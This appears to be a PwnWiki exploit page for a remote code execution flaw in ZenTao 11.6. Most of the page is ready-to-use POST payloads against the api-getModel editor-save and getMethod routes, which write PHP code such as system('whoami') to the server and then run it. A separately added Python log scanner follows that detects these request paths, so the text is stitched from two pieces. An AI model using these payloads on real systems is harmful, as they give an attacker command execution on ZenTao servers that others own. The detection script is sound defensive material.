ZenTao 11.6 Remote Code Execution Vulnerability

From PwnWiki

Exploitation

Remote code execution: running phpinfo();

Payload1

http://127.0.0.1/zentaopms/www/api-getModel-editor-save-filePath=1111

POST: fileContent=<?php phpinfo(); ?>


Payload2

http://127.0.0.1/zentaopms/www/api-getModel-api-getMethod-filePath=1111/1

POST: fileContent=<?php phpinfo(); ?>


Remote code execution: running system('whoami');

Payload1

http://127.0.0.1/zentaopms/www/api-getModel-editor-save-filePath=2222

POST: fileContent=<?php system('whoami'); ?>

Payload2

http://127.0.0.1/zentaopms/www/api-getModel-api-getMethod-filePath=2222/2

POST: fileContent=<?php system('whoami'); ?>
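A defender-side check for the request paths shown above, as an added example that is not part of the original page: it scans web-server access log lines for the two `api-getModel-...-filePath=` routes, including percent-encoded variants. The log lines, IP addresses, the `generic-getModel` catch-all and the placeholder model/method names are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Request-path markers taken from the two payload URLs on this page.
PAGE_PATTERNS = {
    "editor-save": re.compile(r"api-getModel-editor-save-filePath=", re.I),
    "api-getMethod": re.compile(r"api-getModel-api-getMethod-filePath=", re.I),
}
# Assumption: any other api-getModel-<model>-<method> request also deserves review.
GENERIC = re.compile(r"api-getModel-\w+-\w+", re.I)

# Combined log format: client IP ... "METHOD path HTTP/x.y" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

def classify(path):
    """Return a label for a suspicious request path, or None."""
    decoded = path
    for _ in range(2):  # undo up to two layers of percent-encoding
        decoded = unquote(decoded)
    for label, rx in PAGE_PATTERNS.items():
        if rx.search(decoded):
            return label
    return "generic-getModel" if GENERIC.search(decoded) else None

def scan(lines):
    """Return (line_no, ip, method, status, label) for every flagged log line."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if m and (label := classify(m["path"])):
            hits.append((n, m["ip"], m["method"], m["status"], label))
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [09/Sep/2020:17:06:08 +0800] "POST /zentaopms/www/api-getModel-editor-save-filePath=1111 HTTP/1.1" 200 512',
    '203.0.113.5 - - [09/Sep/2020:17:06:09 +0800] "POST /zentaopms/www/api-getModel-api-getMethod-filePath=1111/1 HTTP/1.1" 200 2048',
    '198.51.100.7 - - [09/Sep/2020:17:06:10 +0800] "GET /zentaopms/www/user-login.html HTTP/1.1" 200 3301',
    '203.0.113.5 - - [09/Sep/2020:17:06:11 +0800] "POST /zentaopms/www/api%2DgetModel%2Deditor%2Dsave%2DfilePath=2222 HTTP/1.1" 200 512',
    '198.51.100.9 - - [09/Sep/2020:17:06:12 +0800] "GET /zentaopms/www/api-getModel-examplemodel-examplemethod-arg=1 HTTP/1.1" 200 700',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A 200 status on an `editor-save` hit followed by an `api-getMethod` hit with the same `filePath` value from the same client is the sequence to prioritise for review.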